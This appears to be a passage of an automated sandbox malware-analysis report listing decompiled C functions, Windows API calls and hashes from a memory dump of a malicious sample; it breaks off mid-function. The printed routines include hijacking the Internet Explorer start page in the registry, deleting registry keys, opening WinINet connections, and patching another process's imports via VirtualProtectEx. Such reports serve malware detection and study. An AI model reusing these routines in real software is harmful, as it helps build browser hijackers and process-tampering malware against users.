    • CloseHandle.KERNEL32(?,?,?,?,00403A07,004124A8,?,00000006,00000000,00000000,00000000,00000000), ref: 0040DCB0
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$CloseCreateHandle$MappingSizeView
    • String ID:
    • API String ID: 2246244431-0
    • Opcode ID: 3388d37067595d39ff8123b446749441f7f00b7ceffc8c1476919370207154ac
    • Instruction ID: e07caebaef71d6f87e7cce511bf1d4a2ad3a24bcaf23e9cc1c6394225b5ac337
    • Opcode Fuzzy Hash: 3388d37067595d39ff8123b446749441f7f00b7ceffc8c1476919370207154ac
    • Instruction Fuzzy Hash: FF21A171540601BFD7244BB6CD4DD6BBBFCEBD5B10710CA2EF162D22A0F6B59944CA24
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00409F45, Relevance: 9.0, APIs: 6, Instructions: 31threadsleepCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00409F45() {
				intOrPtr _t7;
				intOrPtr _t9;
				intOrPtr _t11;
				intOrPtr _t14;

				SetThreadPriority(GetCurrentThread(), 2);
				_t7 =  *0x412a64; // 0x246f5a8
				SHDeleteKeyA(0x80000001,  *(_t7 + 0x48));
				_t9 =  *0x412a64; // 0x246f5a8
				SHDeleteKeyA(0x80000002,  *(_t9 + 0x48));
				_t11 =  *0x412a64; // 0x246f5a8
				SHDeleteKeyA(0x80000002,  *(_t11 + 0x4c));
				Sleep(0x3e8);
				_t14 =  *0x412a64; // 0x246f5a8
				return E00409266(0,  *((intOrPtr*)(_t14 + 0x2c)), 0xe, 0, 0, 0, 0);
			}







    0x00409f4f
    0x00409f55
    0x00409f62
    0x00409f68
    0x00409f76
    0x00409f7c
    0x00409f85
    0x00409f90
    0x00409f9c
    0x00409fac

    APIs
    • GetCurrentThread.KERNEL32 ref: 00409F48
    • SetThreadPriority.KERNEL32(00000000,?,00407523), ref: 00409F4F
    • SHDeleteKeyA.SHLWAPI(80000001,?,?,00407523), ref: 00409F62
    • SHDeleteKeyA.SHLWAPI(80000002,?,?,00407523), ref: 00409F76
    • SHDeleteKeyA.SHLWAPI(80000002,?,?,00407523), ref: 00409F85
    • Sleep.KERNEL32(000003E8,?,00407523), ref: 00409F90
      • Part of subcall function 00409266: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 004092BB
      • Part of subcall function 00409266: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 004092D6
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,00000000), ref: 004092F2
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040930B
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 00409325
      • Part of subcall function 00409266: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040933E
      • Part of subcall function 00409266: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040935B
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$DeleteWrite$ReadThread$CreateCurrentHandleNamedPipePrioritySleepState
    • String ID:
    • API String ID: 2160410962-0
    • Opcode ID: 2b86e06d73e18e7ac7113de520c495c066125de6f04befc59045bf898ece4658
    • Instruction ID: f3992a0163d0facdae9a1e90cd676dc4cd94a956fbdedbe313d42d5d28f1ca03
    • Opcode Fuzzy Hash: 2b86e06d73e18e7ac7113de520c495c066125de6f04befc59045bf898ece4658
    • Instruction Fuzzy Hash: 7FF0DA72110120AFEB215FA4EE09FDA3B69EF0C351B018060FA09D61B2D7B19E60CB68
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040D716, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46networkCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040D716(signed int __eax, char* __ecx) {
				short _v28;
				char* _v32;
				signed int _t5;
				void* _t12;
				void* _t14;
				char* _t15;
				void* _t17;

				_t15 = __ecx;
				_t5 = __eax;
				if(__ecx == 0) {
					_t15 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)";
				}
				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
				if(_t14 == 0) {
					L7:
					return 0;
				}
				_t17 = 0;
				do {
					_t1 = _t17 + 0x41200c; // 0x41200c
					_t2 = _t17 + 0x412008; // 0x2
					InternetSetOptionA(_t14,  *_t2, _t1, 4);
					_t17 = _t17 + 8;
				} while (_t17 < 0x18);
				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
				if(_t12 == 0) {
					InternetCloseHandle(_t14);
					goto L7;
				}
				return _t12;
			}










    0x0040d716
    0x0040d716
    0x0040d71c
    0x0040d71e
    0x0040d71e
    0x0040d733
    0x0040d737
    0x0040d77b
    0x00000000
    0x0040d77b
    0x0040d73a
    0x0040d73c
    0x0040d73e
    0x0040d745
    0x0040d74c
    0x0040d752
    0x0040d755
    0x0040d769
    0x0040d772
    0x0040d775
    0x00000000
    0x0040d775
    0x0040d77f

    APIs
    • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 0040D72D
    • InternetSetOptionA.WININET(00000000,00000002,0041200C,00000004), ref: 0040D74C
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040D769
    • InternetCloseHandle.WININET(00000000), ref: 0040D775
    Strings
    • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 0040D71E, 0040D72C
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Internet$CloseConnectHandleOpenOption
    • String ID: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
    • API String ID: 910987326-2068255511
    • Opcode ID: 5cb62407ca279c1d11bc98ae40beaf130e7b35d2d31ea93b2e1f4195a5cd94b4
    • Instruction ID: 86c2908caef9d1014e8a6d5efac7bcd3882bab40932dee281f1179311c2445cd
    • Opcode Fuzzy Hash: 5cb62407ca279c1d11bc98ae40beaf130e7b35d2d31ea93b2e1f4195a5cd94b4
    • Instruction Fuzzy Hash: 10F062B22022207BD7211BA19D88DEB6E5DFF497A1B004535F249E2051C2748864C7F8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040DB1D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 54%
    			E0040DB1D() {
				char _v8;
				struct HINSTANCE__* _v12;
				void* _v1036;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t15;
				char _t22;
				void* _t28;

				_t22 = 0;
				_t13 = LoadLibraryA("urlmon.dll");
				_v12 = _t13;
				if(_t13 != 0) {
					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
					if(_t15 != 0) {
						_push( &_v8);
						_push( &_v1036);
						_push(0);
						_v8 = 0x3ff;
						_v1036 = 0;
						if( *_t15() == 0) {
							if(_v8 > 0x3ff) {
								_v8 = 0x3ff;
							}
							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
							_t22 = E0040D0D5( &_v1036 | 0xffffffff,  &_v1036);
						}
					}
					FreeLibrary(_v12);
				}
				return _t22;
			}










    0x0040db2c
    0x0040db2e
    0x0040db34
    0x0040db39
    0x0040db41
    0x0040db49
    0x0040db4f
    0x0040db56
    0x0040db5c
    0x0040db5d
    0x0040db60
    0x0040db6a
    0x0040db6f
    0x0040db71
    0x0040db71
    0x0040db77
    0x0040db8d
    0x0040db8d
    0x0040db8f
    0x0040db93
    0x0040db93
    0x0040db9d

    APIs
    • LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040DB2E
    • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0040DB41
    • FreeLibrary.KERNEL32(?), ref: 0040DB93
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Library$AddressFreeLoadProc
    • String ID: ObtainUserAgentString$urlmon.dll
    • API String ID: 145871493-2685262326
    • Opcode ID: 289731660acfdc2704dca370dffad9d7289ee30d0ca94e95948d0e2a9cca5f9d
    • Instruction ID: cc68811d53daa7c46d5208e031ddd80310bc59e8b37e3235756379b3f82af4a1
    • Opcode Fuzzy Hash: 289731660acfdc2704dca370dffad9d7289ee30d0ca94e95948d0e2a9cca5f9d
    • Instruction Fuzzy Hash: 350188B1D00254ABCB11AFE49D849DEBBB8AF04311F1041BBB615F3290D9749F498B68
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004075EF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36registryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004075EF(void* __ecx, char* _a4, int _a8) {
				void* _v8;
				int _t13;

				_t13 = 0;
				_v8 = 0x80000001;
				if(RegCreateKeyExA(0x80000001, "software\\microsoft\\internet explorer\\main", 0, 0, 0, 2, 0,  &_v8, 0) == 0) {
					if(RegSetValueExA(_v8, "Start Page", 0, 1, _a4, _a8) == 0) {
						_t13 = 1;
					}
					RegCloseKey(_v8);
				}
				return _t13;
			}





    0x004075f4
    0x0040760c
    0x00407617
    0x00407632
    0x00407634
    0x00407634
    0x00407639
    0x00407639
    0x00407643

    APIs
    • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\internet explorer\main,00000000,00000000,00000000,00000002,00000000,?,00000000,00000001,?,?,00404F5E,00000001,00000000,00000001), ref: 0040760F
    • RegSetValueExA.ADVAPI32(?,Start Page,00000000,00000001,?,?,?,?,00404F5E,00000001,00000000,00000001,!!!0-0=9-0=23434,?,00000001,3709128dk0023444), ref: 0040762A
    • RegCloseKey.ADVAPI32(?,?,?,00404F5E,00000001,00000000,00000001,!!!0-0=9-0=23434,?,00000001,3709128dk0023444,00000001,09ck_=ldfuihpfre), ref: 00407639
    Strings
    • Start Page, xrefs: 00407622
    • software\microsoft\internet explorer\main, xrefs: 00407606
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCreateValue
    • String ID: Start Page$software\microsoft\internet explorer\main
    • API String ID: 1818849710-2333123338
    • Opcode ID: b9f974ca60a0d3de1171d635da07ce6c59c1f364da06d1ed26a979a29a5fe33a
    • Instruction ID: 7426d8eb7775c4f579156ce562c794ed392fa071d08fe2e8c7f59205c624a875
    • Opcode Fuzzy Hash: b9f974ca60a0d3de1171d635da07ce6c59c1f364da06d1ed26a979a29a5fe33a
    • Instruction Fuzzy Hash: B4F012B1684208BFEF255F94CE86EEB776DEB14788F108425F505F11A0E2B69E50D728
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00405CC5, Relevance: 7.6, APIs: 5, Instructions: 118libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 54%
    			E00405CC5(void* __ecx, void* __edx, signed int* _a4) {
				void* __edi;
				void* __esi;
				intOrPtr _t16;
				_Unknown_base(*)()* _t17;
				char* _t19;
				void* _t23;
				void* _t28;
				void* _t31;
				intOrPtr _t34;
				intOrPtr _t37;
				void* _t43;
				signed int* _t45;

				_t41 = __ecx;
				_t43 = __edx;
				if(__ecx == 1) {
					 *_a4 =  *_a4 & 0x00000000;
					return 0x1020500;
				}
				if(__ecx != 2) {
					if(__ecx != 3) {
						if(__ecx != 4) {
							if(__ecx != 5) {
								if(__ecx != 6) {
									if(__ecx != 7) {
										if(__ecx != 8) {
											if(__ecx != 0xa) {
												if(__ecx != 9) {
													if(__ecx != 0xb) {
														if(__ecx != 0xc) {
															if(__ecx != 0xd) {
																if(__ecx != 0xe) {
																	L6:
																	 *_a4 =  *_a4 & 0x00000000;
																	L7:
																	return 0;
																}
																 *_a4 =  *_a4 & 0x00000000;
																_t16 =  *0x412a64; // 0x246f5a8
																_t17 = GetProcAddress( *0x412c18,  *(_t16 + 0x68));
																if(_t17 != 0) {
																	 *_t17(0x8007);
																}
																 *((intOrPtr*)(0)) = 0;
																_t19 = 0;
																L38:
																 *_t19 = 0;
																_t19 = _t19 + 1;
																goto L38;
															}
															_push( *0x412734);
															L33:
															E00405C99(_t43, _a4);
															goto L7;
														}
														_push( *0x412730);
														goto L33;
													}
													_push(0x412740);
													goto L33;
												}
												 *_a4 =  *_a4 & 0x00000000;
												_t23 =  *0x412948; // 0x0
												if(_t23 != 0) {
													CloseHandle(_t23);
													 *0x412948 =  *0x412948 & 0x00000000;
												}
												goto L7;
											}
											_push(0x412740);
											_t45 = 0x412948;
											L23:
											 *_a4 =  *_a4 & 0x00000000;
											E00405C53(_t41, _t45);
											goto L7;
										}
										 *_a4 =  *_a4 & 0x00000000;
										_t28 =  *0x41294c; // 0x0
										if(_t28 != 0) {
											CloseHandle(_t28);
											 *0x41294c =  *0x41294c & 0x00000000;
										}
										goto L7;
									}
									_push( *0x412734);
									_t45 = 0x41294c;
									goto L23;
								}
								 *_a4 =  *_a4 & 0x00000000;
								_t31 =  *0x41273c; // 0x0
								if(_t31 != 0) {
									CloseHandle(_t31);
									 *0x41273c =  *0x41273c & 0x00000000;
								}
								goto L7;
							}
							_push( *0x412730);
							_t45 = 0x41273c;
							goto L23;
						}
						 *_a4 =  *_a4 & 0x00000000;
						_t34 =  *0x412ba0; // 0x17c0
						return _t34;
					}
					SetEvent( *0x412738);
					goto L6;
				} else {
					 *_a4 =  *_a4 & 0x00000000;
					_t37 =  *0x412a8c; // 0x416000
					_t3 = _t37 + 8; // 0x0
					return  *_t3;
				}
			}















    0x00405cc5
    0x00405cca
    0x00405ccf
    0x00405cd4
    0x00000000
    0x00405cd7
    0x00405ce1
    0x00405cf6
    0x00405d15
    0x00405d27
    0x00405d39
    0x00405d5d
    0x00405d6f
    0x00405d96
    0x00405db5
    0x00405de0
    0x00405dec
    0x00405df9
    0x00405e11
    0x00405d04
    0x00405d07
    0x00405d0a
    0x00000000
    0x00405d0a
    0x00405e1a
    0x00405e1d
    0x00405e2b
    0x00405e33
    0x00405e3a
    0x00405e3a
    0x00405e3e
    0x00405e40
    0x00405e42
    0x00405e42
    0x00405e45
    0x00000000
    0x00405e45
    0x00405dfb
    0x00405e01
    0x00405e04
    0x00000000
    0x00405e04
    0x00405dee
    0x00000000
    0x00405dee
    0x00405de2
    0x00000000
    0x00405de2
    0x00405dba
    0x00405dbd
    0x00405dc4
    0x00405dcb
    0x00405dd1
    0x00405dd1
    0x00000000
    0x00405dc4
    0x00405d98
    0x00405d9d
    0x00405da2
    0x00405da5
    0x00405da8
    0x00000000
    0x00405da8
    0x00405d74
    0x00405d77
    0x00405d7e
    0x00405d81
    0x00405d87
    0x00405d87
    0x00000000
    0x00405d7e
    0x00405d5f
    0x00405d65
    0x00000000
    0x00405d65
    0x00405d3e
    0x00405d41
    0x00405d48
    0x00405d4b
    0x00405d51
    0x00405d51
    0x00000000
    0x00405d48
    0x00405d29
    0x00405d2f
    0x00000000
    0x00405d2f
    0x00405d1a
    0x00405d1d
    0x00000000
    0x00405d1d
    0x00405cfe
    0x00000000
    0x00405ce3
    0x00405ce6
    0x00405ce9
    0x00405cee
    0x00000000
    0x00405cee

    APIs
    • CloseHandle.KERNEL32(00000000), ref: 00405D4B
    • CloseHandle.KERNEL32(00000000), ref: 00405D81
    • CloseHandle.KERNEL32(00000000), ref: 00405DCB
    • GetProcAddress.KERNELBASE(?), ref: 00405E2B
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$AddressProc
    • String ID:
    • API String ID: 4209786425-0
    • Opcode ID: 28d3fb948f60cd72b489aba31a573b2b4e18b74fae11d6c3a55426cbf8f57bc7
    • Instruction ID: 4f863c7c412c3f79e11dddebc7f766e184210e1abba91502929e94092bbe4a88
    • Opcode Fuzzy Hash: 28d3fb948f60cd72b489aba31a573b2b4e18b74fae11d6c3a55426cbf8f57bc7
    • Instruction Fuzzy Hash: 8E412B31614A009FDB258B15DE587AB37A5FF11361F10C037E506EB2A0C7B89CA09F9E
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040696D, Relevance: 7.6, APIs: 5, Instructions: 100COMMON
    Download Yara Rule
    C-Code - Quality: 98%
    			E0040696D(void* __ecx, signed int __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, char _a16, char _a20) {
				long _v8;
				void* __edi;
				intOrPtr* _t24;
				intOrPtr _t25;
				signed short _t26;
				int _t27;
				signed short _t28;
				intOrPtr* _t29;
				signed short _t31;
				int _t32;
				signed short _t34;
				signed short _t37;
				void* _t42;
				signed int _t48;
				void* _t57;

				_t48 = __edx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t24 = _a8;
				if(_a16 != 2) {
					_t25 =  *_t24;
				} else {
					_t25 =  *((intOrPtr*)(_t24 + 0x10));
				}
				if(_t25 != 0) {
					_t42 = _t25 + _a4;
					_t26 = IsBadHugeReadPtr(_t42, 4);
					__eflags = _t26;
					if(_t26 == 0) {
						while(1) {
							_t31 =  *_t42;
							__eflags = _t31;
							if(_t31 == 0) {
								break;
							}
							__eflags = _a16 - 2;
							if(_a16 != 2) {
								__eflags = _a16;
								if(_a16 != 0) {
									__eflags = _a16 - 1;
									if(_a16 != 1) {
										goto L18;
									} else {
										__eflags = _t31;
										if(_t31 < 0) {
											goto L18;
										} else {
											_t57 = _t31 + _a4;
											_t34 = VirtualProtectEx( *0x4129ec, _t57, 4, 0x40,  &_v8);
											__eflags = _t34;
											if(_t34 == 0) {
												goto L18;
											} else {
												_t17 = _t57 + 2; // 0x41244a
												_t48 = _t48 | 0xffffffff;
												_t37 = E0040D3EC(_t48, _a12, _t48, _t17);
												VirtualProtectEx( *0x4129ec, _t57, 4, _v8,  &_v8);
												__eflags = _t37;
												goto L17;
											}
										}
									}
								} else {
									__eflags = _t31;
									if(_t31 >= 0) {
										goto L18;
									} else {
										__eflags = _a12 - (_t31 & 0x0000ffff);
										goto L17;
									}
								}
							} else {
								__eflags = _t31 - _a12;
								L17:
								if(__eflags != 0) {
									L18:
									_t42 = _t42 + 4;
									_t32 = IsBadHugeReadPtr(_t42, 4);
									__eflags = _t32;
									if(_t32 == 0) {
										continue;
									}
								}
							}
							break;
						}
					}
					_t27 = IsBadHugeReadPtr(_t42, 4);
					__eflags = _t27;
					if(_t27 != 0) {
						L26:
						_t28 = 0;
						__eflags = 0;
					} else {
						__eflags =  *_t42 - _t27;
						if( *_t42 == _t27) {
							goto L26;
						} else {
							__eflags = _a16 - 2;
							if(_a16 != 2) {
								_t29 = _a8;
								_t53 =  *((intOrPtr*)(_t29 + 0x10)) -  *_t29 + _t42;
								__eflags =  *((intOrPtr*)(_t29 + 0x10)) -  *_t29 + _t42;
							} else {
								_t53 = _t42;
							}
							_t28 = E00406835(_t53,  &_a20);
						}
					}
				} else {
					_t28 = 0;
				}
				return _t28;
			}


















    0x0040696d
    0x00406970
    0x00406971
    0x00406979
    0x0040697d
    0x00406984
    0x0040697f
    0x0040697f
    0x0040697f
    0x00406988
    0x00406995
    0x0040699b
    0x004069a1
    0x004069a3
    0x004069aa
    0x004069aa
    0x004069ac
    0x004069ae
    0x00000000
    0x00000000
    0x004069b4
    0x004069b8
    0x004069bf
    0x004069c3
    0x004069d1
    0x004069d5
    0x00000000
    0x004069d7
    0x004069d7
    0x004069d9
    0x00000000
    0x004069db
    0x004069de
    0x004069f0
    0x004069f6
    0x004069f8
    0x00000000
    0x004069fa
    0x004069fd
    0x00406a00
    0x00406a06
    0x00406a1d
    0x00406a23
    0x00000000
    0x00406a23
    0x004069f8
    0x004069d9
    0x004069c5
    0x004069c5
    0x004069c7
    0x00000000
    0x004069c9
    0x004069cc
    0x00000000
    0x004069cc
    0x004069c7
    0x004069ba
    0x004069ba
    0x00406a25
    0x00406a25
    0x00406a27
    0x00406a29
    0x00406a2d
    0x00406a33
    0x00406a35
    0x00000000
    0x00000000
    0x00406a35
    0x00406a25
    0x00000000
    0x004069b8
    0x00406a3b
    0x00406a3f
    0x00406a45
    0x00406a47
    0x00406a6c
    0x00406a6c
    0x00406a6c
    0x00406a49
    0x00406a49
    0x00406a4b
    0x00000000
    0x00406a4d
    0x00406a4d
    0x00406a51
    0x00406a57
    0x00406a5f
    0x00406a5f
    0x00406a53
    0x00406a53
    0x00406a53
    0x00406a65
    0x00406a65
    0x00406a4b
    0x0040698a
    0x0040698a
    0x0040698a
    0x00406a71

    APIs
    • IsBadHugeReadPtr.KERNEL32(00000000,00000004), ref: 0040699B
    • IsBadHugeReadPtr.KERNEL32(-00000004,00000004), ref: 00406A2D
    • IsBadHugeReadPtr.KERNEL32(00000000,00000004), ref: 00406A3F
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: HugeRead
    • String ID:
    • API String ID: 2080902951-0
    • Opcode ID: 9c2b28c445fdb103559f5ecc9c8dec2dfa73f39c85902b0711ee43601a373df0
    • Instruction ID: 90857d809eb30bdda7fb6041671479c6cd79516dd4972e7f18f76442e8f3e416
    • Opcode Fuzzy Hash: 9c2b28c445fdb103559f5ecc9c8dec2dfa73f39c85902b0711ee43601a373df0
    • Instruction Fuzzy Hash: AF3172B1700246ABDF10DF24DD45B9B3BA8AB02314F168076F903F71D1D678D920DB69
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040A838, Relevance: 7.6, APIs: 5, Instructions: 84networksynchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 94%
    			E0040A838(signed int __eax, void* __ebx, void* __edi) {
				void* __esi;
				signed char _t40;
				signed int _t41;
				void* _t45;
				void* _t62;
				void* _t63;
				signed int _t65;
				void* _t69;
				void* _t70;
				signed char* _t74;

				_t69 = __edi;
				_t62 = __ebx;
				_t74 = __eax * 0x30 +  *0x412e10;
				if(( *_t74 & 0x00000001) != 0) {
					WaitForSingleObject(_t74[0x14], 0xffffffff);
					CloseHandle(_t74[0x14]);
				}
				_push(_t62);
				_t63 = 0;
				if(_t74[0x28] > 0) {
					_push(_t69);
					_t70 = 0;
					do {
						E0040CF40( *((intOrPtr*)(_t74[0x24] + _t70 + 4)));
						E0040CF40( *((intOrPtr*)(_t74[0x24] + _t70 + 0xc)));
						E0040CF40( *((intOrPtr*)(_t74[0x24] + _t70 + 0x10)));
						E0040CF40( *((intOrPtr*)(_t74[0x24] + _t70 + 0x14)));
						_t63 = _t63 + 1;
						_t70 = _t70 + 0x18;
					} while (_t63 < _t74[0x28]);
				}
				E0040CF40(_t74[0x18]);
				E0040CF40(_t74[0x24]);
				if(( *_t74 & 0x00000002) != 0) {
					InternetCloseHandle(_t74[0x10]);
					InternetCloseHandle(_t74[0xc]);
					InternetCloseHandle(_t74[8]);
				}
				_t40 =  *_t74;
				if((_t40 & 0x0000000c) != 0) {
					if((_t40 & 0x00000008) != 0) {
						_t47 = _t74[0x2c];
						if(_t74[0x2c] != 0) {
							E0040CF40( *((intOrPtr*)(_t47 + 0x14)));
						}
					}
					E0040CF40(_t74[0x2c]);
				}
				_t41 =  *0x412e0c; // 0x0
				_t74[4] = _t74[4] & 0x00000000;
				if(_t41 <= 0) {
					L18:
					return _t41;
				} else {
					_t65 =  *0x412e10; // 0x0
					if(_t74 != _t41 * 0x30 + _t65 - 0x30) {
						goto L18;
					} else {
						if(_t41 != 1) {
							_t42 = _t41 - 1;
							 *0x412e0c = _t41 - 1;
							return E0040CED8(_t42 * 0x30, 0x412e10);
						}
						_t45 = E0040CF40(_t65);
						 *0x412e10 =  *0x412e10 & 0x00000000;
						 *0x412e0c =  *0x412e0c & 0x00000000;
						return _t45;
					}
				}
			}













    0x0040a838
    0x0040a838
    0x0040a83e
    0x0040a847
    0x0040a84e
    0x0040a857
    0x0040a857
    0x0040a85d
    0x0040a85e
    0x0040a863
    0x0040a865
    0x0040a866
    0x0040a868
    0x0040a86f
    0x0040a87b
    0x0040a887
    0x0040a893
    0x0040a898
    0x0040a899
    0x0040a89c
    0x0040a8a1
    0x0040a8a5
    0x0040a8ad
    0x0040a8b6
    0x0040a8bb
    0x0040a8c4
    0x0040a8cd
    0x0040a8cd
    0x0040a8d3
    0x0040a8d7
    0x0040a8db
    0x0040a8dd
    0x0040a8e2
    0x0040a8e7
    0x0040a8e7
    0x0040a8e2
    0x0040a8ef
    0x0040a8ef
    0x0040a8f4
    0x0040a8f9
    0x0040a8ff
    0x0040a943
    0x0040a943
    0x0040a901
    0x0040a901
    0x0040a912
    0x00000000
    0x0040a914
    0x0040a917
    0x0040a92f
    0x0040a930
    0x00000000
    0x0040a93d
    0x0040a91a
    0x0040a91f
    0x0040a926
    0x0040a92e
    0x0040a92e
    0x0040a912

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,?,0040C135), ref: 0040A84E
    • CloseHandle.KERNEL32(?), ref: 0040A857
    • InternetCloseHandle.WININET(?), ref: 0040A8BB
    • InternetCloseHandle.WININET(?), ref: 0040A8C4
    • InternetCloseHandle.WININET(?), ref: 0040A8CD
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$Internet$ObjectSingleWait
    • String ID:
    • API String ID: 2916869018-0
    • Opcode ID: f5f6eabec6013882fe9ae0914b5e655e4c5c327207d954bc61636f621c10cf3c
    • Instruction ID: 392a9b98ff70ae517ff64585876de2f89269b0f07f1f4466d38df50159cc76b9
    • Opcode Fuzzy Hash: f5f6eabec6013882fe9ae0914b5e655e4c5c327207d954bc61636f621c10cf3c
    • Instruction Fuzzy Hash: 8D3183326007019FC730AF2ADD81A46BBE6BF04314701CA7EF551A65F1CB75E8619B49
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004091EC, Relevance: 7.5, APIs: 5, Instructions: 28synchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004091EC(void** __esi, intOrPtr _a4) {
				void* _t7;

				_t18 = __esi;
				if(__esi != 0) {
					SetEvent(__esi[1]);
					E00409266(_t18, _a4, 0, 0, 0, 0, 0);
					WaitForSingleObject(__esi[2], 0xffffffff);
					CloseHandle( *__esi);
					CloseHandle(__esi[1]);
					CloseHandle(__esi[2]);
					E0040CF40(__esi[4]);
					return E0040CF40(__esi);
				}
				return _t7;
			}




    0x004091ef
    0x004091f1
    0x004091f6
    0x00409205
    0x0040920f
    0x00409217
    0x00409220
    0x00409229
    0x00409232
    0x00000000
    0x00409238
    0x0040923e

    APIs
    • SetEvent.KERNEL32(?,00000000,004089D0,?), ref: 004091F6
      • Part of subcall function 00409266: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 004092BB
      • Part of subcall function 00409266: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 004092D6
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,00000000), ref: 004092F2
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040930B
      • Part of subcall function 00409266: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 00409325
      • Part of subcall function 00409266: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040933E
      • Part of subcall function 00409266: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040935B
    • WaitForSingleObject.KERNEL32(?,000000FF,0000EA60,00000000,00000000,00000000,00000000,00000000), ref: 0040920F
    • CloseHandle.KERNEL32(00000004), ref: 00409217
    • CloseHandle.KERNEL32(?), ref: 00409220
    • CloseHandle.KERNEL32(?), ref: 00409229
      • Part of subcall function 0040CF40: HeapFree.KERNEL32(00000000,00000000,0040958E,00000000,00000001), ref: 0040CF53
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Handle$CloseWrite$Read$CreateEventFreeHeapNamedObjectPipeSingleStateWait
    • String ID:
    • API String ID: 998100866-0
    • Opcode ID: ef7144c4cf4367d55c7ee9141404e70e10fb2d81fc139922bf5f35d3da979a96
    • Instruction ID: fdc780931818633964e1cd0b074f8ef0f02cc77b69a317d27a95eba1a79fdcc3
    • Opcode Fuzzy Hash: ef7144c4cf4367d55c7ee9141404e70e10fb2d81fc139922bf5f35d3da979a96
    • Instruction Fuzzy Hash: 8FE0C031004501EBC7362F76DE0988EBE72FF447113108A3DF266904B9DF755861AB49
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040EE6E, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 212networkCOMMON
    Download Yara Rule
    C-Code - Quality: 69%
    			E0040EE6E(char _a4) {
				char _v9;
				char _v13;
				char _v20;
				unsigned int _v25;
				short _v27;
				signed char _v28;
				unsigned int _v40;
				short _v42;
				char _v44;
				char _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t54;
				short _t69;
				void* _t71;
				void* _t74;
				void* _t75;
				char _t86;
				char _t94;
				void* _t104;
				void* _t106;
				char _t120;
				char _t125;
				void* _t128;
